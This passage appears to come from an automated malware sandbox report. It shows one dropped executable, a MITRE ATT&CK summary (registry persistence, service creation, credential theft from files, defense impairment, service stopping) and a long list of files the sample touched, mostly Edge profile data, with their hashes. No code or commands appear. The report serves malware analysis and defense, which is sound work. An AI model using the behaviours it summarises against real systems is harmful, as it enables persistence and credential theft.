- C:\Users\Admin\AppData\Local\CanReuseTransform\eiziu\_NewEnum.exe
  C:\Users\Admin\AppData\Local\CanReuseTransform\eiziu\_NewEnum.exe
  2⤵
  - Executes dropped EXE
  PID:6140

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aed593b08b94f34dd8f68fd369652ac2

SHA1
3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95

SHA256
5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7

SHA512
16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aed593b08b94f34dd8f68fd369652ac2

SHA1
3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95

SHA256
5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7

SHA512
16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aed593b08b94f34dd8f68fd369652ac2

SHA1
3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95

SHA256
5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7

SHA512
16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aed593b08b94f34dd8f68fd369652ac2

SHA1
3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95

SHA256
5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7

SHA512
16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aed593b08b94f34dd8f68fd369652ac2

SHA1
3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95

SHA256
5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7

SHA512
16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aed593b08b94f34dd8f68fd369652ac2

SHA1
3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95

SHA256
5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7

SHA512
16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aed593b08b94f34dd8f68fd369652ac2

SHA1
3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95

SHA256
5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7

SHA512
16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a7f568a3d32bd441e85bc1511092fbe0

SHA1
89fbee8e2eb6d74cc3ad66ae3ba6c7f25dce33d2

SHA256
0d60fa886bcba8089cbdc944265c78bddf1a77f28820f5314eba6c83f44c913a

SHA512
8fc5e847481d2bfbb6c0d70a1f152c43fe152d4c4aa8ec61988136945da0af944e4643adafad64a754b9b7f4d117e368916140e8275fc7568e150a98fe570779

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a7f568a3d32bd441e85bc1511092fbe0

SHA1
89fbee8e2eb6d74cc3ad66ae3ba6c7f25dce33d2

SHA256
0d60fa886bcba8089cbdc944265c78bddf1a77f28820f5314eba6c83f44c913a

SHA512
8fc5e847481d2bfbb6c0d70a1f152c43fe152d4c4aa8ec61988136945da0af944e4643adafad64a754b9b7f4d117e368916140e8275fc7568e150a98fe570779

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a7f568a3d32bd441e85bc1511092fbe0

SHA1
89fbee8e2eb6d74cc3ad66ae3ba6c7f25dce33d2

SHA256
0d60fa886bcba8089cbdc944265c78bddf1a77f28820f5314eba6c83f44c913a

SHA512
8fc5e847481d2bfbb6c0d70a1f152c43fe152d4c4aa8ec61988136945da0af944e4643adafad64a754b9b7f4d117e368916140e8275fc7568e150a98fe570779

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
03bb99fa5aa995be0ecef71e9ba45da5

SHA1
a8a427d417bbf4d81c680fb99778b944fcaa7c64

SHA256
2f6b02df4ee6c72702f6d894b00de0eba5961cb71317afa1114801503f489101

SHA512
b62c8be1026527175c1f49c9015c12d3c7749b0525ebdeb72b3044bc8531e455be9bcc00cbb06a742b528716b60cfe616a7817f5962664b51fef61115f951a1a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
37283b22aa2ab3e572b288a4d3e9b59e

SHA1
76ed04e5c29334a0aad5c0029660634318229758

SHA256
02fe1287d0bcda1f1e7aee7c12d6f9fa8bc5653389cd9e2b2737ae12103c34e4

SHA512
ad1da00685e8c2819de8ad53552c0c729df75bd675c56d7d6ce8055586fa388cda682a4b6231505255425f83a57b6f977c852849538f610b6efd37fcac879d6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aed593b08b94f34dd8f68fd369652ac2

SHA1
3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95

SHA256
5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7

SHA512
16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aed593b08b94f34dd8f68fd369652ac2

SHA1
3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95

SHA256
5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7

SHA512
16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aed593b08b94f34dd8f68fd369652ac2

SHA1
3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95

SHA256
5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7

SHA512
16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aed593b08b94f34dd8f68fd369652ac2

SHA1
3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95

SHA256
5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7

SHA512
16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aed593b08b94f34dd8f68fd369652ac2

SHA1
3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95

SHA256
5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7

SHA512
16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aed593b08b94f34dd8f68fd369652ac2

SHA1
3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95

SHA256
5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7

SHA512
16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aed593b08b94f34dd8f68fd369652ac2

SHA1
3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95

SHA256
5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7

SHA512
16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aed593b08b94f34dd8f68fd369652ac2

SHA1
3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95

SHA256
5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7

SHA512
16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aed593b08b94f34dd8f68fd369652ac2

SHA1
3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95

SHA256
5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7

SHA512
16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aed593b08b94f34dd8f68fd369652ac2

SHA1
3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95

SHA256
5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7

SHA512
16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aed593b08b94f34dd8f68fd369652ac2

SHA1
3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95

SHA256
5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7

SHA512
16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aed593b08b94f34dd8f68fd369652ac2

SHA1
3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95

SHA256
5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7

SHA512
16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aed593b08b94f34dd8f68fd369652ac2

SHA1
3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95

SHA256
5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7

SHA512
16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aed593b08b94f34dd8f68fd369652ac2

SHA1
3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95

SHA256
5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7

SHA512
16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aed593b08b94f34dd8f68fd369652ac2

SHA1
3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95

SHA256
5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7

SHA512
16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aed593b08b94f34dd8f68fd369652ac2

SHA1
3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95

SHA256
5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7

SHA512
16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001

Filesize
73KB

MD5
6a42944023566ec0c278574b5d752fc6

SHA1
0ee11c34a0e0d537994a133a2e27b73756536e3c

SHA256
f0ac3833cdb8606be1942cf8f98b4112b7bfd01e8a427720b84d91bdc00dde65

SHA512
5ebdf0d7ec105800059c45ece883ce254f21c39f0e0a12d1992277fe11ef485de75d05827fbbabb4faf0af70b70776c02457873e415ade2df16b8ba726322935

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
21KB

MD5
7d75a9eb3b38b5dd04b8a7ce4f1b87cc

SHA1
68f598c84936c9720c5ffd6685294f5c94000dff

SHA256
6c24799e77b963b00401713a1dbd9cba3a00249b9363e2c194d01b13b8cdb3d7

SHA512
cf0488c34a1af36b1bb854dea2decfc8394f47831b1670cab3eed8291b61188484cc8ab0a726a524ecdd20b71d291bcccbc2ce999fd91662aca63d2d22ed0d9f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
20KB

MD5
923a543cc619ea568f91b723d9fb1ef0

SHA1
6f4ade25559645c741d7327c6e16521e43d7e1f9

SHA256
bf7344209edb1be5a2886c425cf6334a102d76cbea1471fd50171e2ee92877cd

SHA512
a4153751761cd67465374828b0514d7773b8c4ed37779d1ecfd4f19be4faa171585c8ee0b4db59b556399d5d2b9809ba87e04d4715e9d090e1f488d02219d555

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
33KB

MD5
fdbf5bcfbb02e2894a519454c232d32f

SHA1
5e225710e9560458ac032ab80e24d0f3cb81b87a

SHA256
d9315d0678ac213bbe2c1de27528f82fd40dbff160f5a0c19850f891da29ea1c

SHA512
9eb86ebb1b50074df9bd94f7660df6f362b5a46411b35ce820740f629f8ef77f0b49a95c5550441a7db2b2638f0ed3d0204cb8f8c76391c05401506833b8c916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
224KB

MD5
4e08109ee6888eeb2f5d6987513366bc

SHA1
86340f5fa46d1a73db2031d80699937878da635e

SHA256
bf44187e1683e78d3040bcef6263e25783c6936096ff0a621677d411dd9d1339

SHA512
4e477fd9e58676c0e00744dbe3421e528dd2faeca2ab998ebbeb349b35bb3711dcf78d8c9e7adba66b4d681d1982c31cac42024c8b19e19537a5615dac39c661

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000030

Filesize
186KB

MD5
740a924b01c31c08ad37fe04d22af7c5

SHA1
34feb0face110afc3a7673e36d27eee2d4edbbff

SHA256
f0e1953b71cc4abbffdd5096d99dfb274688e517c381b15c3446c28a4ac416e0

SHA512
da7061f944c69245c2f66b0e6a8b5a9bca91bda8a73f99734dcb23db56c5047de796fa7e348ff8840d9ac123436e38a4206408573215b7e5e98942ea6d66bb7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
edc9fdaaf103431a8d74d75278576849

SHA1
26a1b74bb36c3743e3017287ce30e67661955d50

SHA256
5664a8ba0ec0480450acc4a302b866f4773ebe89324adba6bd4e19727c880856

SHA512
70a40102982812314ebc6e24a9a6da33309e6d10ead279854ba794b4de933fb54ea9a25abc90f1020de1dabe91d3b3461d8eeebb0baf3017676ee77253654f41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
a8f310e64bb97ed8326736e6f88328c1

SHA1
5cf48d51a204e5d8458da481a94b52d257f3a7d5

SHA256
eca6da5dbd6e02785a73db3ad659815cd9ac40360c71f64ad8bf1f232dd12e48

SHA512
74cb63150bb0476ecb1ce9fe597c2942e301007ed0e77a49cd264dc140810d5666baab43e2fd03db2d80ecc69d4f385f2d32af14c23ea21acf1b3af061baf890

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
b40962645061f6632906ed28d1ea0265

SHA1
52dece1ded668b1f16f82226181e013eff6c1629

SHA256
c35ee144db2c660097898538f0513ce49872f4b165ec95acd440e6af80efe2fd

SHA512
2f24970fc283bc3b090dededb07078784f5fc8e6cf2675cddc1a9f5afac95b870f82ecf6eb9ecbceed051b6339ac2f3ef44645d9cc9a4adc157cb6109e8d01d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
cf4b0677050ba8d7799c1a606602cc52

SHA1
eb1c6e03cba693e9444f33eea1a23afa2781aba0

SHA256
a32d3aaddafe12d5bebf38ac7181e3d1d8f25069a840ab6a0b847fef202027b1

SHA512
75c8dab96d48ce7c1ba8b6dc56d77a2a46607e747176aaf5f8b45cdfd7f5ce5a43b97f7304c0d8babb641601159c43401e565f4e8d90b660f73a6f5b6d7c4e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
a49eb948632a0978b7dfdad004cf7f60

SHA1
bec6cb19536e4784eecb63f512c40cc0b94169fb

SHA256
739b3758e371c8d45123e8a5c0b99d7a87ff7f8563f42bd08584eef0ca3e40f5

SHA512
7a72c7c46c9fd3e372ab2875e4c3f9ff71733bd08a0158ddd65d36cd161fa2fe955e1022b354c48ada8a9309bce6b448bed72c62963d0962a7f9130a14c1b913

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
ec6fd38de88f1da408a1d7071d7041e7

SHA1
ceabbf77f5c92eb7dbee5097233fe2eafdd313c3

SHA256
0038fb8d33109da76a105050a31f07cb6b402647e8700c53ccfa35909c45805d

SHA512
55c8a6228e6f7526c49db82946b0cbd511bf46657844a41bac0bd6541a789473840d5538e72bf3197772ec4c49a068a1be48c10697afacdd64562a5747e38ac0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
e2565e589c9c038c551766400aefc665

SHA1
77893bb0d295c2737e31a3f539572367c946ab27

SHA256
172017da29bce2bfe0c8b4577a9b8e7a97a0585fd85697f51261f39b28877e80

SHA512
5a33ce3d048f2443c5d1aee3922693decc19c4d172aff0b059b31af3b56aa5e413902f9a9634e5ee874b046ae63a0531985b0361467b62e977dcff7fc9913c4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
e0a6b6943bd2981cef035fd3036ca881

SHA1
9eae6e0750926b8548d615bf74f09e6609bd37ab

SHA256
db3c8da0e51a5f1960909b370d080ab72b60e5197e6b2662d2e7bff7d9a86330

SHA512
9e9067cc0963ee11a553d697405ab804dc71bc0c1071080174df34ff21de149b2ace329f17652b81854677c8596db5a3bce43f50a27a887b0371bc2e4ae8503e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
c606eaa6462c7c91027040db5ed4896d

SHA1
08763dd618de697d3f6e5b70600f6c06a3a45ed6

SHA256
dbf9b0180386cb26a9dc19963cbf672d1da6445975b379aeb7e09838f38a9b74

SHA512
f30a1d62f79fc4017fb65e4a4d44260240a6ac0e4682226cf158b573ba5280ff167be674fc99d833883ec94f82236dfdd5187f7b60efd04471500862d6362aae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
f137089809b79d1ac64f5b9a111da507

SHA1
c7046f74025a8e9bd59fee095d574b3c08f2d46a

SHA256
4bf0306125442f2f8eb84f390c95c741b201dc6f29ceac3a3f567fdc1bc3cc61

SHA512
769c7d59e3a6435e2ef15085684b555f978c315d52c12bd750f855c4a5acd49a72c314b48bcf4d59fd121701b82b5e535ac0c14bfd213d802a09055c67ea37de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe584f73.TMP

Filesize
1KB

MD5
44bc456495f3f9a7e07e851a22ac1ad6

SHA1
09742e79dc9fa9084e5ecfa71c389bd42cb0c7a5

SHA256
057065ed902d1d0dfb710473a4456a2be36f731e772e918c3f6c50d330cbb489

SHA512
5fa763aaee3d1e72a6d84aafeb25d2b727c7ab3fb597292d772d2526d9d968009fabef651b37d1be2316c5a1946c93f5751afb5171d059b111dad0b52db19038

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
aefd77f47fb84fae5ea194496b44c67a

SHA1
dcfbb6a5b8d05662c4858664f81693bb7f803b82

SHA256
4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

SHA512
b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
a5c5956ee91a45cc283265d416b0e8bc

SHA1
862a7bff3bccc2b80941bb53b1b065ac5da9f2bb

SHA256
f34cafb2c2145f6202eff25b19c32d65c3979bf132a4e74a64818824301c4748

SHA512
64c6f872f30d65f2a5fd65e6eb0752e28ffcb970c6b6579e87fa29942ed8c584c698c00cece9a0ed6767985506325c9a1489d6ab6a72bb3e0dc3e5781707faf3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
a5c5956ee91a45cc283265d416b0e8bc

SHA1
862a7bff3bccc2b80941bb53b1b065ac5da9f2bb

SHA256
f34cafb2c2145f6202eff25b19c32d65c3979bf132a4e74a64818824301c4748

SHA512
64c6f872f30d65f2a5fd65e6eb0752e28ffcb970c6b6579e87fa29942ed8c584c698c00cece9a0ed6767985506325c9a1489d6ab6a72bb3e0dc3e5781707faf3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
a5c5956ee91a45cc283265d416b0e8bc

SHA1
862a7bff3bccc2b80941bb53b1b065ac5da9f2bb

SHA256
f34cafb2c2145f6202eff25b19c32d65c3979bf132a4e74a64818824301c4748

SHA512
64c6f872f30d65f2a5fd65e6eb0752e28ffcb970c6b6579e87fa29942ed8c584c698c00cece9a0ed6767985506325c9a1489d6ab6a72bb3e0dc3e5781707faf3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
3a5919d48fe9cd252673e0fc5e71ccc8

SHA1
b18a83fd6172c66584a43fc18c4648b8e751f142

SHA256
ea26979c45e4cc5af5d2cabf1720350ed2b454c72b3b5e531438ea8a97631b4a

SHA512
2efef0f492aa017506dc5ab208641807757c2f3c120adbe35bd819e2de22579f4210fc51d678594cf89f0080da8ec28c51c86febe2f255761adee66aa2c44df6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
3a5919d48fe9cd252673e0fc5e71ccc8

SHA1
b18a83fd6172c66584a43fc18c4648b8e751f142

SHA256
ea26979c45e4cc5af5d2cabf1720350ed2b454c72b3b5e531438ea8a97631b4a

SHA512
2efef0f492aa017506dc5ab208641807757c2f3c120adbe35bd819e2de22579f4210fc51d678594cf89f0080da8ec28c51c86febe2f255761adee66aa2c44df6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
39664990bde2d8ec2f0239e872209230

SHA1
da20f28063f23849441cfcf0359ad871fa6f9f2e

SHA256
659dd6693adb5f4b13243ae3cfdfca499ef2e6e01702baa0643330db8ec9d931

SHA512
a18d2f14d826e41840c77b5b01777bf60b25e0156322bb7f39a60ef135f6c3b25b1b102e78bce634aa367e5c45621c4f01d0e4ceda5f8466221421708701a83e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
a0c9b7dfeaee05fb97a8f2e1050d098e

SHA1
8f4918e06262664369274677b7929b8c97d33a24

SHA256
